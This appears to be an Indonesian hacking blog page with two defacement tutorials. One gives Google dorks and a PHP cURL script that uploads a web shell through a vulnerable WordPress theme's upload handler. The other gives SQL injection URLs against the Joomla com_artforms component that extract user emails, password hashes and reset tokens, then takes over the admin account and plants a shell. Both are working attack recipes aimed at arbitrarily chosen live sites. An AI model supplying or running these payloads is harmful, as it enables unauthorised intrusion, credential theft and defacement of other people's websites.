Social Icons

twitterfacebook

Minggu, 05 Januari 2014

Tutorial Deface With REMOTE FILE UPLOAD EXPLOIT VULNERABILITY


By 4SPIR3
Bahan-Bahan:
-XAMPP (Serch Di Google Banyak Kok)
-Shell (Bisa Pakek Shell GCA)

Langkah-Langkah:
1).Search Di Google Gunakan Dork

inurl:"/wp-content/themes/bordeaux-theme/"
inurl:"/wp-content/themes/bulteno-theme/"
inurl:"/wp-content/themes/oxygen-theme/"
inurl:"/wp-content/themes/radial-theme/"
inurl:"/wp-content/themes/rayoflight-theme/"
inurl:"/wp-content/themes/reganto-theme/"
inurl:"/wp-content/themes/rockstar-theme/"

2).Ane Pkek Dork Yang inurl:"/wp-content/themes/radial-theme/"

3).Jika Ketemu Masukan Exploit /wp-content/themes/radial-theme/functions/upload-handler.php jika Keluar Error Situsnya Vuln

4).Buat File Baru Berekstensi .php Contoh lol.php Dan Simpan Script Berikut Di Directory C:/XAMPP/php Masukan Script Berikut Edit-Edit Dikit :D


$uploadfile="shellKamu.php";
$ch = curl_init("http://site.com/wp-content/themes/radial-theme/functions/upload-handler.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('orange_themes'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>


5).Masukan Shell Ente Juga Jadi Ada Dua File Di Directory C:/XAMPP/php yaitu Shell Dan Script Tadi :D

6) Aktifkan Xampp Pada Apache
7).Buka cmd Dengan Cara Klik Start -> Run -> Ketik "cmd"
8).Ketik cd\xampp/php


9)ketik php namascript.php Contoh: php lol.php
10).Jika Succes Akan Ada Nama Shellnya :D


11).Untuk Letak Shellnya Ada Di
http://site.com/wp-content/uploads/2013/11/namashell.php


Jika ada yg di tanyakan tanyakan di forum kami
Disini 
readmore...

Deface Dengan Com_Artform

udah lama kaga posting
maklum admin lagi UAS
heheheheh :v

langsung aja deh kita bahas mengenai topik yaitu
Deface Dengan Com_Artform dari 4SPIR3


1. Ketik dork ini ke google : inurl:"option com_artforms"

2. Pilih salah 1 web untuk dijadikan target

3. Masukkan exploit ini : /index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(email,0x3a,username,0x3a,password)+from+jos_users--
Contoh : www.site.com/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(email,0x3a,username,0x3a,password)+from+jos_users--

4. Nanti anda akan melihat email dari web tersebut. Copy email tersebut ke notepad.

5. Sekarang anda masuk ke tempat reset password dengan buka tab baru, lalu masukkan kode ini /index.php?option=com_user&view=reset
Contoh : www.site.com/index.php?option=com_user&view=reset

6. Sebelum reset password, anda akan disuruh memasukkan email. Nah, masukkan email yang tadi anda copy ke notepad. Lalu klik "submit"

7. Selanjutnya, anda akan disuruh memasukkan token. Nah anda buka tab baru dan masukkan exploit ini : index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(username,0x3a,activation)+from+jos_users
Contoh : www.site.com/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(username,0x3a,activation)+from+jos_users

8. Nanti akan muncul kode aktivasi/token seperti ini admineda7d6142fac40a533b56407a4617371. Yang ditebalkan adalah username webnya, sedangkan yang digariskan adalah tokennya. Anda masukkan token tersebut pada form memasukkan token yang tadi. Klik enter.

9. Kini form untuk mereset password sudah muncul, nah masukkan password yang anda inginkan untuk masuk ke web tersebut sebagai admin. Misal : androidnymous

10. Jika berhasil, anda masuk deh ke panel adminnya : www.site.com/administrator

11. Masukkan username yang tadi ditemukan dan password yang sudah anda reset.
Contoh : username = admin, password = androidnymous

12. Dan kini anda berhasil masuk sebagai admin. Saatnya mulai menanam shell anda


jangan lupa kunjungi page kami DISINI
readmore...